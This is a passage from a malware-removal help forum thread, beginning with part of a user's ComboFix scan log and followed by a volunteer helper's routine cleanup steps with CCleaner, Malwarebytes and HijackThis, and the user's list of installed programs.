2014-01-29 07:53 . 2014-01-29 07:53 1643520 ----a-w- c:\windows\system32\DWrite.dll
2014-01-29 07:53 . 2014-01-29 07:53 161792 ----a-w- c:\windows\SysWow64\d3d10_1.dll
2014-01-29 07:53 . 2014-01-29 07:53 1247744 ----a-w- c:\windows\SysWow64\DWrite.dll
2014-01-29 07:53 . 2014-01-29 07:53 1175552 ----a-w- c:\windows\system32\FntCache.dll
2014-01-29 07:53 . 2014-01-29 07:53 1080832 ----a-w- c:\windows\SysWow64\d3d10.dll
2014-01-29 07:53 . 2014-01-29 07:53 296960 ----a-w- c:\windows\system32\d3d10core.dll
2014-01-29 07:53 . 2014-01-29 07:53 1238528 ----a-w- c:\windows\system32\d3d10.dll
2014-01-29 07:53 . 2014-01-29 07:53 333312 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-01-29 07:53 . 2014-01-29 07:53 245248 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2014-01-29 07:53 . 2014-01-29 07:53 194560 ----a-w- c:\windows\system32\d3d10_1.dll
2014-01-29 07:53 . 2014-01-29 07:53 648192 ----a-w- c:\windows\system32\d3d10level9.dll
2014-01-29 07:53 . 2014-01-29 07:53 293376 ----a-w- c:\windows\SysWow64\dxgi.dll
2014-01-29 07:53 . 2014-01-29 07:53 221184 ----a-w- c:\windows\system32\UIAnimation.dll
2014-01-29 07:53 . 2014-01-29 07:53 187392 ----a-w- c:\windows\SysWow64\UIAnimation.dll
2014-01-25 22:46 . 2009-07-14 02:36 175616 ----a-w- c:\windows\system32\msclmd.dll
2014-01-25 22:46 . 2009-07-14 02:36 152576 ----a-w- c:\windows\SysWow64\msclmd.dll
2014-01-21 01:03 . 2010-06-24 01:33 22240 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1AMPCBOK]
@="{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}"
[HKEY_CLASSES_ROOT\CLSID\{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}]
2010-11-05 01:58 297808 ----a-w- c:\windows\System32\mscoree.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2009-09-08 98304]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2013-09-13 59720]
"EEventManager"="c:\program files (x86)\Epson Software\Event Manager\EEventManager.exe" [2009-12-03 976320]
"AvastUI.exe"="c:\program files\AVAST Software\Avast\AvastUI.exe" [2014-03-15 3767096]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ sasnative64\0autocheck autochk *
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe"
.
R2 BBSvc;Bing Bar Update Service;c:\program files (x86)\Microsoft\BingBar\BBSvc.EXE;c:\program files (x86)\Microsoft\BingBar\BBSvc.EXE [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys;c:\windows\SYSNATIVE\drivers\aswStm.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;PCDSRVC{F36B3A4C-F95654BD-06000000}_0 - PCDR Kernel Mode Service Helper Driver;c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms;c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S0 aswRvrt;avast! Revert; [x]
S0 aswVmm;avast! VM Monitor; [x]
S1 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys;c:\windows\SYSNATIVE\drivers\aswKbd.sys [x]
S1 aswNdisFlt;Avast! Firewall Driver;c:\windows\system32\DRIVERS\aswNdisFlt.sys;c:\windows\SYSNATIVE\DRIVERS\aswNdisFlt.sys [x]
S1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys;c:\windows\SYSNATIVE\drivers\aswSnx.sys [x]
S1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys;c:\windows\SYSNATIVE\drivers\aswSP.sys [x]
S2 ABBYY.Licensing.FineReader.Sprint.9.0;ABBYY FineReader 9.0 Sprint Licensing Service;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys;c:\windows\SYSNATIVE\drivers\aswMonFlt.sys [x]
S2 avast! Firewall;avast! Firewall;c:\program files\AVAST Software\Avast\afwServ.exe;c:\program files\AVAST Software\Avast\afwServ.exe [x]
S2 BBUpdate;BBUpdate;c:\program files (x86)\Microsoft\BingBar\SeaPort.EXE;c:\program files (x86)\Microsoft\BingBar\SeaPort.EXE [x]
S2 cvhsvc;Client Virtualization Handler;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE [x]
S2 EPSON_EB_RPCV4_04;EPSON V5 Service4(04);c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE;c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE [x]
S2 EPSON_PM_RPCV4_04;EPSON V3 Service4(04);c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE;c:\program files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [x]
S2 sftlist;Application Virtualization Client;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe [x]
S2 TuneUp.UtilitiesSvc;AVG PC TuneUp Service;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 Sftfs;Sftfs;c:\windows\system32\DRIVERS\Sftfslh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftfslh.sys [x]
S3 Sftplay;Sftplay;c:\windows\system32\DRIVERS\Sftplaylh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftplaylh.sys [x]
S3 Sftredir;Sftredir;c:\windows\system32\DRIVERS\Sftredirlh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftredirlh.sys [x]
S3 Sftvol;Sftvol;c:\windows\system32\DRIVERS\Sftvollh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftvollh.sys [x]
S3 sftvsa;Application Virtualization Service Agent;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [x]
S3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys;c:\program files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [x]
.
.
Contents of the 'Scheduled Tasks' folder
.
2014-03-26 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-02-06 21:17]
.
2014-01-20 c:\windows\Tasks\PCDRScheduledMaintenance.job
- c:\program files\PC-Doctor for Windows\pcdrcui.exe [2009-09-18 07:11]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2014-03-15 23:06 287280 ----a-w- c:\program files\AVAST Software\Avast\ashShA64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1AMPCBOK]
@="{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}"
[HKEY_CLASSES_ROOT\CLSID\{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}]
2010-11-05 01:57 444752 ----a-w- c:\windows\System32\mscoree.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office12\EXCEL.EXE/3000
TCP: DhcpNameServer = 192.168.0.1
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{13070af0-bc6c-4185-8baa-40a4cf05b323} - (no file)
BHO-{497c088e-1b2a-43fe-8431-d5d257f37546} - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
ShellIconOverlayIdentifiers-{4d87b7a7-23f1-470c-aa45-96b25b9bd138} - (no file)
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PCDSRVC{F36B3A4C-F95654BD-06000000}_0]
"ImagePath"="\??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-1730965262-3147105662-1425472414-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-1730965262-3147105662-1425472414-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10c.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10c.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-03-26 16:27:35
ComboFix-quarantined-files.txt 2014-03-26 06:27
ComboFix2.txt 2014-03-24 23:14
.
Pre-Run: 652,774,146,048 bytes free
Post-Run: 652,473,430,016 bytes free
.
- - End Of File - - E6BDD3DB76006ADF905C37575C28EB50
B408478238977884445221DD3C0F0326

#13 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 27 March 2014 - 10:09 AM


Hello Paulie67

I would like to see a report that combofix makes.

extra combofix report
  • push the "windows key" + "R" (between the "Ctrl" button and "Alt" Button)
  • please copy and past the following into the box
C:\Qoobox\Add-Remove Programs.txt
  • click ok
copy and paste the report into this topic for me to review

Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#14 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 27 March 2014 - 03:27 PM

ABBYY FineReader 9.0 Sprint
Activation Assistant for the 2007 Microsoft Office suites
ActiveCheck component for HP Active Support Library
Adobe AIR
Adobe Flash Player 10 ActiveX
Adobe Flash Player 12 Plugin
Adobe Reader XI (11.0.06)
Adobe Shockwave Player 12.0
Apple Application Support
Apple Software Update
avast! Premier
AVG PC TuneUp 2014
AVG PC TuneUp 2014 (en-US)
Bing Bar
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Common
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center HydraVision Full
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
Compatibility Pack for the 2007 Office system
CyberLink DVD Suite Deluxe
D3DX10
DirectX for Managed Code Update (Summer 2004)
Epson Easy Photo Print 2
Epson Easy Photo Print Plug-in for PMB(Picture Motion Browser)
Epson Event Manager
EPSON Scan
EPSON TX420 NX420 Series Manual
EPSON TX420 NX420 Series Network Guide
EpsonNet Print
EpsonNet Setup 3.2
HP Advisor
HP Customer Experience Enhancements
HP Games
HP Odometer
HP Setup
HP Support Assistant
HP Support Information
HP Update
HPAsset component for HP Active Support Library
HydraVision
Junk Mail filter update
LabelPrint
LightScribe System Software
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft Office 2010
Microsoft Office Click-to-Run 2010
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Office Starter 2010 - English
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Works
Mozilla Firefox 27.0.1 (x86 en-US)
Mozilla Thunderbird 24.2.0 (x86 en-US)
MSVCRT
MSVCRT_amd64
Power2Go
PowerDirector
Realtek High Definition Audio Driver
Recovery Manager
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
swMSM
Visual Studio 2012 x86 Redistributables
Windows Live Communications Platform
Windows Live Essentials
Windows Live Installer
Windows Live Mail
Windows Live Messenger
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live Sync
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
 



#15 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 29 March 2014 - 08:31 AM


Hello

These logs are looking allot better. But we still have some work to do.

Please print out these instructions, or copy them to a Notepad file. It will make it easier for you to follow the instructions and complete all of the necessary steps..

Clean Out Temp Files
  • This small application you may want to keep and use once a week to keep the computer clean.

    Download CCleaner from here CCleaner
    • Run the installer to install the application.
    • When it gives you the option to install Yahoo toolbar uncheck the box next to it.
    • Run CCleaner. default settings are fine
    • Click Run Cleaner.
    • Close CCleaner.
: Malwarebytes' Anti-Malware :

I see that you have MBAM installed - That is great!! and at this time I would like you to update it and run me a quick scan
  • Double-click mbam icon
  • go to the update tab at the top
  • click on check for updates
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select Perform quick scan, then click Scan.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is Checked (ticked) except items in the C:\System Volume Information folder and click on Remove Selected.
  • When completed, a log will open in Notepad. please copy and paste the log into your next reply
    • If you accidentally close it, the log file is saved here and will be named like this:
    • C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\mbam-log-date (time).txt
Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware.



Download HijackThis
  • Go Here to download HijackThis program
  • Save HijackThis to your desktop.
  • Right Click on Hijackthis and select "Run as Admin" (XP users just need to double click to run)
  • Click on "Do A system scan and save a logfile" (if you do not see "Do A system scan and save a logfile" then click on main menu)
  • copy and paste hijackthis report into the topic
"information and logs"
  • In your next post I need the following
    • Log From MBAM
    • report from Hijackthis
    • let me know of any problems you may have had
    • How is the computer doing now?
Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users